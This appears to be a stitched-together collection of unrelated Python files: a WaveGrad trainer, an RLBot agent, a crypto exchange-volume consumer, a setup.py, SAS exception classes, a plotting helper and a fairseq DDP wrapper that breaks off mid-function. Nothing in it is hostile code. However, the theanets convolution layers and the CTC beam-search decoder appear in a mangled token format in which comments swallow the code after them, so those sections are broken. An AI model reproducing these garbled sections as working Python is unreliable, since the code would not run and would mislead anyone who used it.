        self.noise_level = torch.tensor(noise_level.astype(np.float32))
        self.loss_fn = nn.L1Loss()
        self.summary_writer = None

    def state_dict(self):
        """Return a CPU-resident snapshot of the full training state."""
        # Unwrap DistributedDataParallel so checkpoints are portable.
        if hasattr(self.model, 'module') and isinstance(self.model.module, nn.Module):
            model_state = self.model.module.state_dict()
        else:
            model_state = self.model.state_dict()
        return {
            'step': self.step,
            'model': {k: v.cpu() if isinstance(v, torch.Tensor) else v
                      for k, v in model_state.items()},
            'optimizer': {k: v.cpu() if isinstance(v, torch.Tensor) else v
                          for k, v in self.optimizer.state_dict().items()},
            'params': dict(self.params),
            'scaler': self.scaler.state_dict(),
        }

    def load_state_dict(self, state_dict):
        """Restore model, optimizer, grad scaler and step from a snapshot."""
        if hasattr(self.model, 'module') and isinstance(self.model.module, nn.Module):
            self.model.module.load_state_dict(state_dict['model'])
        else:
            self.model.load_state_dict(state_dict['model'])
        self.optimizer.load_state_dict(state_dict['optimizer'])
        self.scaler.load_state_dict(state_dict['scaler'])
        self.step = state_dict['step']

    def save_to_checkpoint(self, filename='weights'):
        """Save a step-stamped checkpoint and refresh the '<filename>.pt' link.

        BUG FIX: the checkpoint names previously used a literal placeholder
        string instead of the `filename` parameter, so `filename` was ignored.
        """
        save_basename = f'{filename}-{self.step}.pt'
        save_name = f'{self.model_dir}/{save_basename}'
        link_name = f'{self.model_dir}/{filename}.pt'
        torch.save(self.state_dict(), save_name)
        if os.name == 'nt':
            # Windows symlinks require elevated privileges; write a copy.
            torch.save(self.state_dict(), link_name)
        else:
            if os.path.islink(link_name):
                os.unlink(link_name)
            os.symlink(save_basename, link_name)

    def restore_from_checkpoint(self, filename='weights'):
        """Load '<model_dir>/<filename>.pt' if present; return success flag.

        BUG FIX: previously loaded a literal placeholder path instead of
        using the `filename` parameter.
        """
        try:
            checkpoint = torch.load(f'{self.model_dir}/{filename}.pt')
            self.load_state_dict(checkpoint)
            return True
        except FileNotFoundError:
            return False

    def train(self, max_steps=None):
        """Run the training loop until `max_steps` (or forever if None)."""
        device = next(self.model.parameters()).device
        while True:
            for features in tqdm(self.dataset, desc=f'Epoch {self.step // len(self.dataset)}') if self.is_master else self.dataset:
                if max_steps is not None and self.step >= max_steps:
                    return
                features = _nested_map(features, lambda x: x.to(device) if isinstance(x, torch.Tensor) else x)
                loss = self.train_step(features)
                if torch.isnan(loss).any():
                    raise RuntimeError(f'Detected NaN loss at step {self.step}.')
                if self.is_master:
                    if self.step % 100 == 0:
                        self._write_summary(self.step, features, loss)
                    if self.step % len(self.dataset) == 0:
                        self.save_to_checkpoint()
                self.step += 1

    def train_step(self, features):
        """One diffusion training step; returns the (scalar tensor) loss."""
        # Zero gradients by detaching them, which is cheaper than zero_grad().
        for param in self.model.parameters():
            param.grad = None

        audio = features['audio']
        spectrogram = features['spectrogram']

        N, T = audio.shape
        S = 1000  # number of discrete noise-schedule segments
        device = audio.device
        self.noise_level = self.noise_level.to(device)

        with self.autocast:
            # Sample a continuous noise scale uniformly within a random
            # segment [noise_level[s-1], noise_level[s]] per example.
            s = torch.randint(1, S + 1, [N], device=audio.device)
            l_a, l_b = self.noise_level[s - 1], self.noise_level[s]
            noise_scale = l_a + torch.rand(N, device=audio.device) * (l_b - l_a)
            noise_scale = noise_scale.unsqueeze(1)
            noise = torch.randn_like(audio)
            noisy_audio = noise_scale * audio + (1.0 - noise_scale**2)**0.5 * noise

            predicted = self.model(noisy_audio, spectrogram, noise_scale.squeeze(1))
            loss = self.loss_fn(noise, predicted.squeeze(1))

        self.scaler.scale(loss).backward()
        self.scaler.unscale_(self.optimizer)
        self.grad_norm = nn.utils.clip_grad_norm_(self.model.parameters(), self.params.max_grad_norm)
        self.scaler.step(self.optimizer)
        self.scaler.update()
        return loss

    def _write_summary(self, step, features, loss):
        """Write audio, loss, and grad-norm summaries to TensorBoard."""
        writer = self.summary_writer or SummaryWriter(self.model_dir, purge_step=step)
        writer.add_audio('audio/reference', features['audio'][0], step, sample_rate=self.params.sample_rate)
        writer.add_scalar('train/loss', loss, step)
        writer.add_scalar('train/grad_norm', self.grad_norm, step)
        writer.flush()
        self.summary_writer = writer


def _train_impl(replica_id, model, dataset, args, params):
    """Shared trainer setup for single-GPU and distributed training."""
    torch.backends.cudnn.benchmark = True
    opt = torch.optim.Adam(model.parameters(), lr=params.learning_rate)

    learner = WaveGradLearner(args.model_dir, model, dataset, opt, params, fp16=args.fp16)
    learner.is_master = (replica_id == 0)
    learner.restore_from_checkpoint()
    learner.train(max_steps=args.max_steps)


def train(args, params):
    """Train on a single GPU."""
    dataset = dataset_from_path(args.data_dirs, params)
    model = WaveGrad(params).cuda()
    _train_impl(0, model, dataset, args, params)


def train_distributed(replica_id, replica_count, port, args, params):
    """Train one replica of a multi-GPU NCCL process group."""
    os.environ['MASTER_ADDR'] = 'localhost'
    os.environ['MASTER_PORT'] = str(port)
    torch.distributed.init_process_group('nccl', rank=replica_id, world_size=replica_count)

    device = torch.device('cuda', replica_id)
    torch.cuda.set_device(device)
    model = WaveGrad(params).to(device)
    model = DistributedDataParallel(model, device_ids=[replica_id])
    _train_impl(replica_id, model,
                dataset_from_path(args.data_dirs, params, is_distributed=True),
                args, params)
import os

from rlbot.agents.base_independent_agent import BaseIndependentAgent
from rlbot.botmanager.helper_process_request import HelperProcessRequest


class DroneAgent(BaseIndependentAgent):
    """Bot that delegates all of its decision making to a hivemind process."""

    # Path to the hivemind helper-process python file.
    hive_path = None
    # Bots sharing the same key join the same hivemind.
    hive_key = None
    # Display name of the hivemind in the console.
    hive_name = None

    def __init__(self, name, team, index):
        super().__init__(name, team, index)

        # Subclasses must configure all three hivemind attributes.
        if self.hive_path is None:
            raise NotImplementedError('You need to specify a path to the hivemind file.')
        if self.hive_key is None:
            raise NotImplementedError('You need to specify a key for your hivemind.')
        if self.hive_name is None:
            raise NotImplementedError('You need to specify a name for your hivemind.')

    def run_independently(self, terminate_request_event):
        # All control logic lives in the hivemind helper process.
        pass

    def get_helper_process_request(self) -> HelperProcessRequest:
        if not os.path.isfile(self.hive_path):
            raise FileNotFoundError(f'Could not find file: {self.hive_path}')

        # hive_path in the key keeps hiveminds from different locations
        # separate; team in the key gives each team its own hivemind.
        key = f'{self.hive_path}{self.hive_key}{self.team}'

        return HelperProcessRequest(self.hive_path, key,
                                    options={'name': self.hive_name})
import pyximport
pyximport.install()

import json
import os
import subprocess

from delorean import epoch
from raven import Client

from gryphon.data_service.consts import *
from gryphon.data_service.queue_consumer import QueueConsumer
from gryphon.lib import session
from gryphon.lib.models.emeraldhavoc.exchange_volume import ExchangeVolume
from gryphon.lib.money import Money

s = Client(dsn=os.environ.get('SENTRY_DSN'))


def exchange_volumes_consumer_function(message, db):
    """Persist one exchange-volume queue message into the database."""
    # Heartbeat file polled by monit for liveness checks.
    subprocess.call(['touch', 'monit/heartbeat/exchange_volumes_consumer.txt'])

    exchange_volume_json = json.loads(message)
    timestamp = epoch(exchange_volume_json['timestamp']).datetime
    exchange = exchange_volume_json['exchange_name']
    exch_vol_money = Money(exchange_volume_json['volume'], 'BTC')

    t = ExchangeVolume(
        exchange_volume=exch_vol_money,
        exchange=exchange,
        timestamp=timestamp,
    )

    db.add(t)
    session.commit_mysql_session(db)


def main():
    """Run the queue consumer until interrupted, reporting errors to Sentry."""
    db = session.get_a_gds_db_mysql_session()
    # BUG FIX: initialize before the try block so the KeyboardInterrupt
    # handler can't hit a NameError if the constructor never completed.
    volume_consumer = None

    try:
        volume_consumer = QueueConsumer(
            os.environ.get('AMPQ_ADDRESS'),
            exchange_volumes_consumer_function,
            db,
            EXCHANGE,
            EXCHANGE_TYPE,
            EXCHANGE_VOLUME_BINDING_KEY,
            EXCHANGE_VOLUME_QUEUE,
        )
        volume_consumer.run()
    except KeyboardInterrupt:
        if volume_consumer is not None:
            volume_consumer.stop()
    except Exception:
        # Best-effort service loop: report anything unexpected and exit.
        # (Was a bare `except:`, which also swallowed SystemExit.)
        s.captureException()
    finally:
        db.remove()


if __name__ == '__main__':
    main()
# -*- coding: utf-8 -*- '''Convolutional layers "scan" over input data.'''<import_from_future_stmt> division<import_stmt>numpy<as>np<import_stmt>theano<import_stmt>theano.tensor<as>TT<import_from_stmt>. base<import_from_stmt>.. util<line_sep>__all__=['Conv1' 'Conv2' 'Pool1' 'Pool2' ]<class_stmt>Convolution(base.Layer)<block_start>'''Convolution layers convolve filters over the input arrays. Parameters ---------- filter_size : (int, int) Size of the convolution filters for this layer. stride : (int, int), optional Apply convolutions with this stride; i.e., skip this many samples between convolutions. Defaults to (1, 1)---that is, no skipping. border_mode : str, optional Compute convolutions with this border mode. Defaults to 'valid'. '''<def_stmt>__init__ self filter_size stride=(1 1) border_mode='valid' **kwargs<block_start>self.filter_size=filter_size<line_sep>self.stride=stride<line_sep>self.border_mode=border_mode<line_sep>super(Convolution self).__init__(**kwargs)<block_end><def_stmt>log self<block_start>inputs=', '.join('"{0}" {1}'.format(*ns)<for>ns self._input_shapes.items())<line_sep>util.log('layer {0.__class__.__name__} "{0.name}" '<concat>'{0.output_shape} {1} {0.border_mode} '<concat>'filters {2}{3} from {4}' self getattr(self.activate 'name' self.activate) 'x'.join(str(i)<for>i self.filter_size) ''.join('+{}'.format(i)<for>i self.stride) inputs)<line_sep>util.log('learnable parameters: {}' self.log_params())<block_end><def_stmt>add_conv_weights self name mean=0 std=<none> sparsity=0<block_start>'''Add a convolutional weight array to this layer's parameters. Parameters ---------- name : str Name of the parameter to add. mean : float, optional Mean value for randomly-initialized weights. Defaults to 0. std : float, optional Standard deviation of initial matrix values. Defaults to :math:`1 / sqrt(n_i + n_o)`. sparsity : float, optional Fraction of weights to set to zero. Defaults to 0. 
'''<line_sep>nin=self.input_size<line_sep>nout=self.output_size<line_sep>mean=self.kwargs.get('mean_{}'.format(name) self.kwargs.get('mean' mean))<line_sep>std=self.kwargs.get('std_{}'.format(name) self.kwargs.get('std' std<or>1/np.sqrt(nin+nout)))<line_sep>sparsity=self.kwargs.get('sparsity_{}'.format(name) self.kwargs.get('sparsity' sparsity))<line_sep>arr=np.zeros((nout nin)+self.filter_size util.FLOAT)<for_stmt>r range(self.filter_size[0])<block_start><for_stmt>c range(self.filter_size[1])<block_start>arr[: : r c]=util.random_matrix(nout nin mean std sparsity=sparsity rng=self.rng)<block_end><block_end>self._params.append(theano.shared(arr name=self._fmt(name)))<block_end><block_end><class_stmt>Conv1(Convolution)<block_start>'''1-dimensional convolutions run over one data axis. Notes ----- One-dimensional convolution layers are typically used in ``theanets`` models that use recurrent inputs and outputs, i.e., :class:`theanets.recurrent.Autoencoder`, :class:`theanets.recurrent.Predictor`, :class:`theanets.recurrent.Classifier`, or :class:`theanets.recurrent.Regressor`. The convolution will be applied over the "time" dimension (axis 1). Parameters ---------- filter_size : int Length of the convolution filters for this layer. stride : int, optional Apply convolutions with this stride; i.e., skip this many samples between convolutions. Defaults to 1, i.e., no skipping. border_mode : str, optional Compute convolutions with this border mode. Defaults to 'valid'. 
'''<def_stmt>__init__ self filter_size stride=1 border_mode='valid' **kwargs<block_start>super(Conv1 self).__init__(filter_size=(1 filter_size) stride=(1 stride) border_mode=border_mode **kwargs)<block_end><def_stmt>setup self<block_start>self.add_conv_weights('w')<line_sep>self.add_bias('b' self.output_size)<block_end><def_stmt>resolve_outputs self<block_start><if_stmt>self.input_shape<is><none><or>self.input_shape[0]<is><none><block_start><return>super(Conv1 self).resolve_outputs()<block_end>image=np.array(self.input_shape[:-1])<line_sep>kernel=np.array(self.filter_size)<line_sep>result=image<if_stmt>self.border_mode<eq>'full'<block_start>result=image+kernel-1<block_end><if_stmt>self.border_mode<eq>'valid'<block_start>result=image-kernel+1<block_end>self._output_shapes['out']=tuple(result)+(self.kwargs['size'] )<block_end><def_stmt>transform self inputs# input is: (batch, time, input) # conv2d wants: (batch, input, 1, time) <block_start>x=inputs[self.input_name].dimshuffle(0 2 'x' 1)<line_sep>pre=TT.nnet.conv2d(x self.find('w') image_shape=(<none> self.input_size 1 <none>) filter_shape=(self.output_size self.input_size)+self.filter_size border_mode=self.border_mode subsample=self.stride ).dimshuffle(0 3 1 2)[: : : 0]+self.find('b')<line_sep># conv2d output is: (batch, output, 1, time) # we want: (batch, time, output) # (have to do [:, :, :, 0] to remove unused trailing dimension) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end><class_stmt>Conv2(Convolution)<block_start>'''2-dimensional convolutions run over two data axes. Two-dimensional convolution layers are standard image processing techniques. In theanets, these layers expect an input consisting of (num-examples, width, height, num-channels). Parameters ---------- filter_size : (int, int) Size of the convolution filters for this layer. stride : (int, int), optional Apply convolutions with this stride; i.e., skip this many samples between convolutions. 
Defaults to (1, 1), i.e., no skipping. border_mode : str, optional Compute convolutions with this border mode. Defaults to 'valid'. '''<def_stmt>setup self<block_start>self.add_conv_weights('w')<line_sep>self.add_bias('b' self.output_size)<block_end><def_stmt>resolve_outputs self<block_start>shape=self.input_shape<if_stmt>shape<is><none><or>shape[0]<is><none><or>shape[1]<is><none><block_start><return>super(Conv2 self).resolve_outputs()<block_end>image=np.array(shape[:-1])<line_sep>kernel=np.array(self.filter_size)<line_sep>result=image<if_stmt>self.border_mode<eq>'full'<block_start>result=image+kernel-1<block_end><if_stmt>self.border_mode<eq>'valid'<block_start>result=image-kernel+1<block_end>self._output_shapes['out']=tuple(result)+(self.kwargs['size'] )<block_end><def_stmt>transform self inputs# input is: (batch, width, height, input) # conv2d wants: (batch, input, width, height) <block_start>x=inputs[self.input_name].dimshuffle(0 3 1 2)<line_sep>pre=TT.nnet.conv2d(x self.find('w') image_shape=(<none> self.input_size <none> <none>) filter_shape=(self.output_size self.input_size)+self.filter_size border_mode=self.border_mode subsample=self.stride ).dimshuffle(0 2 3 1)+self.find('b')<line_sep># conv2d output is: (batch, output, width, height) # we want: (batch, width, height, output) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end><class_stmt>Pooling(base.Layer)<block_start>''' '''<block_end><class_stmt>Pool1(Pooling)<block_start>''' '''<def_stmt>transform self inputs# input is: (batch, time, input) # conv2d wants: (batch, input, time, 1) <block_start>x=inputs[self.input_name].dimshuffle(0 2 1 'x')<line_sep>pre=TT.signal.downsample.max_pool_2d(x self.pool_size st=self.stride mode=self.mode ).dimshuffle(0 2 1 3)[: : : 0]<line_sep># conv2d output is: (batch, output, time, 1) # we want: (batch, time, output) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end><class_stmt>Pool2(Pooling)<block_start>''' '''<def_stmt>transform self 
inputs# input is: (batch, width, height, input) # conv2d wants: (batch, input, width, height) <block_start>x=inputs[self.input_name].dimshuffle(0 3 1 2)<line_sep>pre=TT.signal.downsample.max_pool_2d(x self.pool_size st=self.stride mode=self.mode ).dimshuffle(0 2 3 1)<line_sep># conv2d output is: (batch, output, width, height) # we want: (batch, width, height, output) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end>
from io import open

from setuptools import find_packages, setup

# Optional dependency groups: every "serving" flavour needs the FastAPI web
# stack; the torch flavour additionally needs torch itself.
extras = {
    'serving': ['pydantic', 'uvicorn', 'fastapi'],
    'serving-tf': ['pydantic', 'uvicorn', 'fastapi'],
    'serving-torch': ['pydantic', 'uvicorn', 'fastapi', 'torch'],
}
# BUG FIX: the original wrote `[package for package in extras.values()]`,
# which produces a list of *lists* (each value is itself a requirement list),
# an invalid extras_require entry that pip rejects. Flatten and de-duplicate
# so that `pip install s2s-ft[all]` installs every optional dependency.
extras['all'] = sorted({package for packages in extras.values() for package in packages})

setup(
    name="s2s-ft",
    version="0.0.1",
    author="UniLM Team",
    author_email="<EMAIL>",
    description="Fine-Tuning Bidirectional Transformers for Sequence-to-Sequence Learning",
    long_description=open("README.md", "r", encoding='utf-8').read(),
    long_description_content_type="text/markdown",
    keywords='Fine-Tuning Bidirectional Transformers for Sequence-to-Sequence Learning',
    license='Apache',
    url="https://github.com/microsoft/unilm/tree/master/s2s-ft",
    packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
    install_requires=['numpy', 'boto3', 'requests', 'tqdm', 'regex != 2019.12.17',
                      'sentencepiece', 'sacremoses', 'tensorboardX',
                      'transformers <= 2.10.0'],
    extras_require=extras,
    python_requires='>=3.5.0',
    classifiers=[
        'Programming Language :: Python :: 3',
    ],
)
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
DisagreementDiversityMeasure
"""

from ..utils.entrypoints import Component


def disagreement_diversity_measure(**params):
    """
    **Description**
        None
    """
    # Build the entrypoint component directly; this measure takes no
    # settings, so any extra keyword arguments are intentionally ignored
    # (auto-generated signature convention).
    return Component(
        name='DisagreementDiversityMeasure',
        settings={},
        kind='EnsembleBinaryDiversityMeasure')
# From https://github.com/githubharald/CTCDecoder # #MIT License #Copyright (c) 2018 <NAME> #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. 
<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>numpy<as>np<class_stmt>BeamEntry<block_start>"information about one single beam at specific time-step"<def_stmt>__init__ self<block_start>self.prTotal=0# blank and non-blank self.prNonBlank=0# non-blank self.prBlank=0# blank self.prText=1# LM score self.lmApplied=<false># flag if LM was already applied to this beam self.labeling=()<block_end><block_end># beam-labeling <class_stmt>BeamState<block_start>"information about the beams at specific time-step"<def_stmt>__init__ self<block_start>self.entries={}<block_end><def_stmt>norm self<block_start>"length-normalise LM score"<for_stmt>(k _) self.entries.items()<block_start>labelingLen=len(self.entries[k].labeling)<line_sep>self.entries[k].prText=self.entries[k].prText<power>(1.0/(labelingLen<if>labelingLen<else>1.0))<block_end><block_end><def_stmt>sort self<block_start>"return beam-labelings, sorted by probability"<line_sep>beams=[v<for>(_ v) self.entries.items()]<line_sep>sortedBeams=sorted(beams reverse=<true> key=<lambda>x:x.prTotal<times>x.prText)<line_sep><return>[x.labeling<for>x sortedBeams]<block_end><block_end><def_stmt>applyLM parentBeam childBeam classes lm<block_start>"calculate LM score of child beam by taking score from parent beam and bigram probability of last two chars"<if_stmt>lm<and><not>childBeam.lmApplied<block_start>c1=classes[parentBeam.labeling[-1]<if>parentBeam.labeling<else>classes.index(' ')]# first char c2=classes[childBeam.labeling[-1]]# second char lmFactor=0.01# influence of language model bigramProb=lm.getCharBigram(c1 c2)<power>lmFactor# probability of seeing first and second char next to each other childBeam.prText=parentBeam.prText<times>bigramProb# probability of char sequence childBeam.lmApplied=<true><block_end><block_end># only apply LM once per beam entry <def_stmt>addBeam beamState labeling<block_start>"add beam if it does not yet 
exist"<if_stmt>labeling<not><in>beamState.entries<block_start>beamState.entries[labeling]=BeamEntry()<block_end><block_end><def_stmt>ctcBeamSearch mat classes lm beamWidth<block_start>"beam search as described by the paper of Hwang et al. and the paper of Graves et al."<line_sep>blankIdx=len(classes)<line_sep>maxT,maxC=mat.shape<line_sep># initialise beam state last=BeamState()<line_sep>labeling=()<line_sep>last.entries[labeling]=BeamEntry()<line_sep>last.entries[labeling].prBlank=1<line_sep>last.entries[labeling].prTotal=1<line_sep># go over all time-steps <for_stmt>t range(maxT)<block_start>curr=BeamState()<line_sep># get beam-labelings of best beams bestLabelings=last.sort()[0:beamWidth]<line_sep># go over best beams <for_stmt>labeling bestLabelings# probability of paths ending with a non-blank <block_start>prNonBlank=0<line_sep># in case of non-empty beam <if_stmt>labeling# probability of paths with repeated last char at the end <block_start><try_stmt><block_start>prNonBlank=last.entries[labeling].prNonBlank<times>mat[t labeling[-1]]<block_end><except_stmt>FloatingPointError<block_start>prNonBlank=0<block_end><block_end># probability of paths ending with a blank prBlank=(last.entries[labeling].prTotal)<times>mat[t blankIdx]<line_sep># add beam at current time-step if needed addBeam(curr labeling)<line_sep># fill in data curr.entries[labeling].labeling=labeling<line_sep>curr.entries[labeling].prNonBlank<augadd>prNonBlank<line_sep>curr.entries[labeling].prBlank<augadd>prBlank<line_sep>curr.entries[labeling].prTotal<augadd>prBlank+prNonBlank<line_sep>curr.entries[labeling].prText=last.entries[labeling].prText# beam-labeling not changed, therefore also LM score unchanged from curr.entries[labeling].lmApplied=<true># LM already applied at previous time-step for this beam-labeling # extend current beam-labeling <for_stmt>c range(maxC-1)# add new char to current beam-labeling <block_start>newLabeling=labeling+(c )<line_sep># if new labeling contains duplicate char at 
the end, only consider paths ending with a blank <if_stmt>labeling<and>labeling[-1]<eq>c<block_start>prNonBlank=mat[t c]<times>last.entries[labeling].prBlank<block_end><else_stmt><block_start>prNonBlank=mat[t c]<times>last.entries[labeling].prTotal<block_end># add beam at current time-step if needed addBeam(curr newLabeling)<line_sep># fill in data curr.entries[newLabeling].labeling=newLabeling<line_sep>curr.entries[newLabeling].prNonBlank<augadd>prNonBlank<line_sep>curr.entries[newLabeling].prTotal<augadd>prNonBlank<line_sep># apply LM applyLM(curr.entries[labeling] curr.entries[newLabeling] classes lm)<block_end><block_end># set new beam state last=curr<block_end># normalise LM scores according to beam-labeling-length last.norm()<line_sep># sort by probability bestLabelings=last.sort()[:beamWidth]# get most probable labeling output=[]<for_stmt>bestLabeling bestLabelings# map labels to chars <block_start>res=''<for_stmt>l bestLabeling<block_start>res<augadd>classes[l]<block_end>output.append(res)<block_end><return>output<block_end><def_stmt>testBeamSearch <block_start>"test decoder"<line_sep>classes='ab'<line_sep>mat=np.array([[0.4 0 0.6] [0.4 0 0.6]])<line_sep>print('Test beam search')<line_sep>expected='a'<line_sep>actual=ctcBeamSearch(mat classes <none>)<line_sep>print('Expected: "'+expected+'"')<line_sep>print('Actual: "'+actual+'"')<line_sep>print('OK'<if>expected<eq>actual<else>'ERROR')<block_end><if_stmt>__name__<eq>'__main__'<block_start>testBeamSearch()<block_end>
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#


class SASConfigNotFoundError(Exception):
    """Raised when the given configuration path does not exist."""

    def __init__(self, path: str):
        self.path = path

    def __str__(self):
        return 'Configuration path {} does not exist.'.format(self.path)


class SASConfigNotValidError(Exception):
    """Raised when a configuration definition fails validation."""

    def __init__(self, defn: str, msg: str = None):
        # Fall back to 'N/A' when no definition name was supplied.
        self.defn = defn if defn else 'N/A'
        self.msg = msg

    def __str__(self):
        return 'Configuration definition {} is not valid. {}'.format(self.defn, self.msg)


class SASIONotSupportedError(Exception):
    """Raised when an I/O access method is unavailable on Windows."""

    def __init__(self, method: str, alts: list = None):
        self.method = method
        self.alts = alts  # optional list of alternative I/O methods

    def __str__(self):
        if self.alts is not None:
            alt_text = 'Try the following: {}'.format(', '.join(self.alts))
        else:
            alt_text = ''
        return 'Cannot use {} I/O module on Windows. {}'.format(self.method, alt_text)


class SASHTTPauthenticateError(Exception):
    """Raised when fetching an HTTP auth token fails."""

    def __init__(self, msg: str):
        self.msg = msg

    def __str__(self):
        return 'Failure in GET AuthToken.\n {}'.format(self.msg)


class SASHTTPconnectionError(Exception):
    """Raised when establishing the HTTP connection fails."""

    def __init__(self, msg: str):
        self.msg = msg

    def __str__(self):
        return 'Failure in GET Connection.\n {}'.format(self.msg)


class SASHTTPsubmissionError(Exception):
    """Raised when submitting code over HTTP fails."""

    def __init__(self, msg: str):
        self.msg = msg

    def __str__(self):
        return 'Failure in submit().\n {}'.format(self.msg)
from typing import List

import matplotlib.pyplot as plt
import numpy as np

# Colour used for points that are not labelled yet in the current frame.
BG_COLOR = "lavender"
# One foreground colour per class, assigned in order of unique label ids.
FG_COLORS = [
    "b",
    "g",
    "r",
    "c",
    "m",
    "y",
    "tab:orange",
    "tab:purple",
    "limegreen",
    "yellow",
    "tab:brown",
]


def make_animation_from_data(
    features: np.ndarray, labels: np.ndarray, labelled_at: np.ndarray, classes: List[str]
) -> List[np.ndarray]:
    """
    Make an animation that show the progress of labelling.

    Args:
        features: 2d features representation of the inputs. Shape [samples, 2]
        labels: Label id for each inputs. Shape [samples]
        labelled_at: Index at which the input was labelled. Shape [samples]
        classes: List of classes.

    Returns:
        Animated frames of the labelling process. You can then save it locally with:
            `imageio.mimsave('output.gif', frames, fps=3)`
    """
    assert features.ndim == 2 and features.shape[-1] == 2, "Can only plot 2d points!"

    frames = []
    # Render frames from "everything labelled" backwards, one per step.
    for frame_id in reversed(range(np.max(labelled_at))):
        # New frame
        fig, ax = plt.subplots(figsize=(10, 10))

        # Split points into labelled / unlabelled for this frame.
        currently_labelled = labelled_at > frame_id
        unlabelled_features = features[~currently_labelled]
        labelled_features = features[currently_labelled]
        labelled_labels = labels[currently_labelled]
        unique_labels = np.unique(labelled_labels)

        ax.scatter(
            unlabelled_features[:, 0],
            unlabelled_features[:, 1],
            c=BG_COLOR,
            label="Unlabelled",
            marker="x",
            zorder=2,
        )
        for color, label_name, label_id in zip(FG_COLORS, classes, unique_labels):
            label_mask = labelled_labels == label_id
            class_points = labelled_features[label_mask]
            ax.scatter(class_points[:, 0], class_points[:, 1], c=color, label=label_name, marker="x", zorder=2)

        ax.set_title("{} : {}/{}".format("Labelling progress", currently_labelled.sum(), len(currently_labelled)))
        ax.legend(loc="best", ncol=1, prop={"size": 15}, markerscale=3, fancybox=True, shadow=True)
        fig.set_size_inches(15, 10.0)
        fig.canvas.draw()
        # NOTE(review): FigureCanvas.tostring_rgb is deprecated in recent
        # matplotlib releases — confirm the pinned matplotlib version still
        # provides it (buffer_rgba would be the modern replacement).
        image = np.frombuffer(fig.canvas.tostring_rgb(), dtype="uint8")
        image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
        frames.append(image)
        plt.close(fig)

    return frames


if __name__ == "__main__":
    from sklearn.datasets import make_classification
    import imageio

    # 2D input to mimic a t-SNE-like shape.
    X, y = make_classification(
        n_features=2,
        n_redundant=0,
        n_informative=2,
        random_state=1,
        n_clusters_per_class=1,
        n_classes=3,
    )
    labelled_at = np.random.randint(0, 100, size=[X.shape[0]])
    class_name = ["cow", "dog", "cat"]

    frames = make_animation_from_data(X, y, labelled_at, class_name)
    imageio.mimsave("output.gif", frames, fps=3)
from packaging.version import Version

import pip_audit._util as util


def test_python_version():
    """The helper must return the running interpreter's version as a parsed Version."""
    version = util.python_version()
    assert version is not None
    assert isinstance(version, Version)
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.

"""
A modified version of the legacy DistributedDataParallel module that uses c10d
communication primitives. This is necessary for models that have conditional
computation (e.g., AdaptiveSoftmax) and which therefore do not work with the
c10d version of DDP.

This version also supports the *accumulate_grads* feature, which allows faster
training with `--update-freq`.
"""

import copy

import torch
from torch import nn
from torch.autograd import Variable

from . import distributed_utils


class LegacyDistributedDataParallel(nn.Module):
    """Implements distributed data parallelism at the module level.

    A simplified version of :class:`torch.nn.parallel.DistributedDataParallel`.
    This version uses a c10d process group for communication and does not
    broadcast buffers.

    Args:
        module (~torch.nn.Module): module to be parallelized
        world_size (int): number of parallel workers
        process_group (optional): the c10d process group to be used for
            distributed data all-reduction. If None, the default process group
            will be used.
        buffer_size (int, optional): number of elements to buffer before
            performing all-reduce (default: 256M).
    """

    def __init__(self, module, world_size, process_group=None, buffer_size=2**28):
        super().__init__()

        self.module = module
        self.world_size = world_size
        self.process_group = process_group

        # Never use a bigger buffer than the number of model params
        self.buffer_size = min(buffer_size, sum(p.numel() for p in module.parameters()))
        self.buffer = None

        # Flag used by the NCCL backend to make sure we only reduce gradients
        # one time in the execution engine
        self.need_reduction = False

        # We can also forcibly accumulate grads locally and only do the
        # all-reduce at some later time
        self.accumulate_grads = False

        # For NCCL backend, since every single NCCL call is asynchoronous, we
        # therefore directly enqueue all the NCCL reduction calls to the
        # default CUDA stream without spawning up other reduction threads.
        # This achieves the best performance.
        self._register_grad_hook()

    def __getstate__(self):
        # Plain copy of the instance dict; hooks are re-registered on load.
        attrs = copy.copy(self.__dict__)
        return attrs

    def __setstate__(self, state):
        super().__setstate__(state)
        self._register_grad_hook()

    def forward(self, *inputs, **kwargs):
        # Pure pass-through to the wrapped module.
        return self.module(*inputs, **kwargs)

    def _register_grad_hook(self):
        """
        This function registers the callback all-reduction function for the
        NCCL backend. All gradients will be all reduced in one single step.
        The NCCL reduction will directly be enqueued into the default CUDA
        stream. Therefore, no synchronization is needed.
        """

        def all_reduce(params):
            # Pack the given params' grads into one flat buffer, all-reduce
            # it, then scatter the averaged values back into the grads.
            buffer = self.buffer
            nonzero_buffer = False
            if len(params) > 1:
                offset = 0
                for p in params:
                    sz = p.numel()
                    if p.grad is not None:
